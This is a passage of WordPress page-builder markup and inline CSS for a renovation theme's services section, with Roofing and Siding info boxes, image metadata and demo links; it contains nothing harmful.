/wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"056cb894-6454-42df-942f-dfc188516e3c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-056cb894-6454-42df-942f-dfc188516e3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"50e69a29-82aa-4d9a-8393-5d7206f14a34\"} -->\n<style type=\"text/css\"> .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-50e69a29-82aa-4d9a-8393-5d7206f14a34 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"8084ee78-5871-48ad-a7a9-1e3b52164921\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8084ee78-5871-48ad-a7a9-1e3b52164921\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"dd2fb7db-992d-423c-ac16-d676e4901ec9\"} -->\n<style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"02734963-0b31-4312-8c71-a66457a80c8b\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02734963-0b31-4312-8c71-a66457a80c8b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"180058dd-db27-45c4-a0de-f8703e853737\"} -->\n<style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"767f5573-d592-456c-a81e-eac9c44adadf\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-767f5573-d592-456c-a81e-eac9c44adadf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"6a884b41-c026-4a57-9b2b-25862220e646\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n 